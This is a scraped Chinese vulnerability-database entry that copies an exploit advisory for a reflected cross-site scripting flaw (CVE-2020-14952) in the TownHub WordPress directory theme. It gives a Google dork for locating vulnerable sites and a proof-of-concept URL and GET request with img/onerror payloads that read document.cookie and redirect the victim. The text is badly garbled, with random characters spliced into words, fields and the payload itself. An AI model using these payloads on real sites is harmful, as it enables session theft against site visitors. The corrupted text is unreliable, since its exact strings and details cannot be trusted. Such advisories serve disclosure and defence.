TownHub – Directory & Listing WordPress Theme v1.2.9 – Unauthenticated Reflected XSS – CXSecurity.com

漏洞ID 2064115 漏洞类型
发布时间 2020-06-22 更新时间 2020-06-22
CVE编号 CVE-2020-14952

CNNVD-ID N/A
漏洞平台 N/A Cx 0 6 h a [ .VSS评分 N/A
|漏洞来源
https://cxsecu9 S * B r K g Qrity.com/issue/M ` | ? B ] $WLB-2020060095
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[+] Exploit Title: TowP V 1 b N T KnHub - Directory & Listing WordPress Theme v1.2.9 - UnauK h ?thenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/townhub/
[+] Date: 2Z n _ l 8 k u c020-06-1l r u R Q 17
[+] Exploip | p G ut Auth*  [or: VlT d 2 i & ? : e `ad Vector [ https://vladvector.ru ]
[+] Vendor: CTHthemes [ https://cththemes.com ]
[+] Software Version: 1.2c _ 4 : Y.9
[+] Software Link: https://themeforest.net/item/townhub-directory-listing-wordpressf N & O t  v i a-tha L q 0 2 1 e |eme/25019571
[+] Tested on: Debiann s o | I J E A f 10
[+] CVE: CVE-2020-14952
[+] CWE: CWE-79O q ? S l v ,
### [ PoC: ]
[!] https://townhub| ~ } u.cththemes.com/?search_term=&location_s: N 5 h i _ # S xearch=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3Eo ` o x  S l S&ag U ? ] _ : Dmp;distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&ab 6 b c F Z d d Kmp;address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookig ` M N Q b N $ ye)%3E&address_lng=%22%3E%3Cimg%20src=xL J ~%20onerror=alert(`PoC`);window.location=`h4 ) wttps:/ C e n G/twitter.com/vlad_vector`;%3E&; R { _ b _amp;lcats[]=195
[!1 T S [ w X] GET /?search_t o a 4 4 & 5 ] Ferm=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`y * ^)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&a` . X { H . 9 4 #ddress_lat=%a c f J y i P B 422%3E%3Cimg%20src=x%20onerror=alert(s a l d & } D {document.cookie)%3E&address_lng=%22%3EW ` w ( H k R%3Cimg%20src=x%20onerror=aa . L [ ) J 0 a klert(`PoC`);window.location=`https://: t )twitter.com/vlad_vector`;%3E&lcats[]=1f 0 c W d95 HTTP/1.1
Host: townhub.cththemes.$ s A & f  +com
### [ Contacts: ]
[#] Web. * J ) x L site: vladvector.ru
[#] Telegram: @vladv$ h + H 7ector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvec_ 1 N Ftor